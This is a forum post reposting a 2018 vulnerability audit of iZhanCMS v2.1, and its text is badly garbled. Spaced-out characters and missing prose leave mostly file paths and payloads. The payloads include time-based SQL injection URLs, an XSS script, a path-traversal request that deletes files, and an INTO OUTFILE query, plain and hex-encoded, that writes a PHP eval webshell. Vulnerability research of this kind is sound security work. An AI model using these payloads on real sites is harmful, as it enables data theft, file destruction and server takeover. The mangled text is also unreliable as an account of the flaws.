搜索

[843] 2018-03-01_【代码审计】iZhanCMS_v2.1漏洞分析

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-16
2018-03-01_【代码审计】iZhanCMS_v2.1漏洞分析 0 1 0 2 0 3 i Z h a n C M S _ v 2 . 1     B y p a s s   B y p a s s   2 0 1 8 - 0 3 - 0 1         C M S C M S i Z h a n C M S _ v 2 . 1 i Z h a n C M S h t t p : / / w w w . i z h a n c m s . c o m C M S z e n d 6 . 0   V 2 . 1 h t t p : / / w w w . i z h a n c m s . c o m / c a t e g o r y / C a t e g o r y / i n d e x / c i d / 1 h t t p : / / 1 2 7 . 0 . 0 . 1 / a d m i n / a d m i n / i n d e x a d m i n   S Q L
0 4 :   / a p p l i c a t i o n / i n d e x / c o n t r o l l e r s / I n d e x C o n t r o l l e r . p h p   8 9 - 1 0 2 i d S Q L S Q L P a y l o a d h t t p : / / 1 2 7 . 0 . 0 . 1 / i n d e x / i n d e x / q r c o d e P r e v i e w ? i d = 2 / * * / x o r / * * / i f ( s u b s t r i n g ( u s e r ( ) , 1 , 1 ) = ' 2 ' , s l e e p ( 5 ) , 0 ) - - 使 S Q L M A P S Q L
0 5 / a p p l i c a t i o n / g o o d s / c o n t r o l l e r s / G o o d s C o n t r o l l e r . p h p   6 8 - 9 6 i d g e t L i n k g o o d s i d i d S Q L S Q L g e t L i n k g o o d s i d / a p p l i c a t i o n / g o o d s / m o d e l s / G o o d s M o d e l . p h p   9 1 - 1 0 9 i d S Q L i d S Q L S Q L P a y l o a d h t t p : / / 1 2 7 . 0 . 0 . 1 / g o o d s / G o o d s / i n f o ? i d = 2   x o r   i f ( ' 2 ' = ' 2 ' , s l e e p ( 5 ) , 0 ) - - 使 S Q L M A P X S S
0 6 - - - - P a y l o a d : 2 2 2 < s c r i p t > a l e r t ( / x s s / ) < / s c r i p t > j s S Q L / a d m i n / a p p l i c a t i o n / e x t e n s i o n s / c o n t r o l l e r s / Q r c o d e C o n t r o l l e r . p h p   2 3 5 - 2 4 6 i d S Q L S Q L / a d m i n / a p p l i c a t i o n / w e b s e t / c o n t r o l l e r s / M a n a g e l o g C o n t r o l l e r . p h p  
/ a d m i n / a p p l i c a t i o n / w e b s e t / c o n t r o l l e r s / M a n a g e l o g C o n t r o l l e r . p h p   3 3 - 5 7 / a d m i n / a p p l i c a t i o n / w e b s e t / c o n t r o l l e r s / A d m i n u s e r C o n t r o l l e r . p h p 3 7 - 6 9 k e y w o r d S Q L S Q L   P a y l o a d h t t p : / / 1 2 7 . 0 . 0 . 1 / a d m i n / e x t e n s i o n s / q r c o d e / p r e v i e w ? i d = 2 使 S Q L M A P - - - - - - - - k e y w o r d - - - - - - - - k e y w o r d
0 7
0 8 / a d m i n / a p p l i c a t i o n / w e b s e t / c o n t r o l l e r s / D b r e c o v e r C o n t r o l l e r . p h p   d e l e t e T a b l e / a d m i n / a p p l i c a t i o n / w e b s e t / m o d e l s / T a b l e M o d e l . p h p   $ s a v e _ p a t h $ f i l e n _ p a t h t e s t . t x t P a y l o a d t e s t . t x t   P a y l o a d : h t t p : / / 1 2 7 . 0 . 0 . 1 / a d m i n / w e b s e t / d b r e c o v e r / d e l e t e ? t b n a m e = . . / . . / . . / t e s t . t x t G e t s h e l l
- - - - - - - - t a g . l i b . p h p P a y l o a d : p h p i n f o ( ) ; 访   h t t p : / / 1 2 7 . 0 . 0 . 1 / l i b r a r y / m a i n o n e / t a g l i b / t a g s . l i b . p h p   S Q L w e b s h e l l S Q L S Q L h t m l 使 i n t o   o u t f i l e s e l e c t   ' < ? p h p   e v a l ( $ _ P O S T [ c m d ] ) ; ? > '   i n t o   o u t f i l e   ' c : / w w w / 2 2 2 a a a . p h p '     H e x P y a l o a d S E L E C T     1 1 1 2 2 2   I N T O   O U T F I L E   ' E : / s t u d y / W W W / i Z h a n C M S / 2 2 2 2 . p h p '     L I N E S T E R M I N A T E D   B Y     0 x 3 C 3 F 7 0 6 8 7 0 2 0 4 0 6 5 7 6 6 1 6 C 2 8 2 4 5 F 5 0 4 F 5 3 5 4 5 B 2 7 6 1 2 7 5 D 2 9 3 B 3 F 3 E  
0 9 w e b s h e l l         B y p a s s A b o u t   M e W A F

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理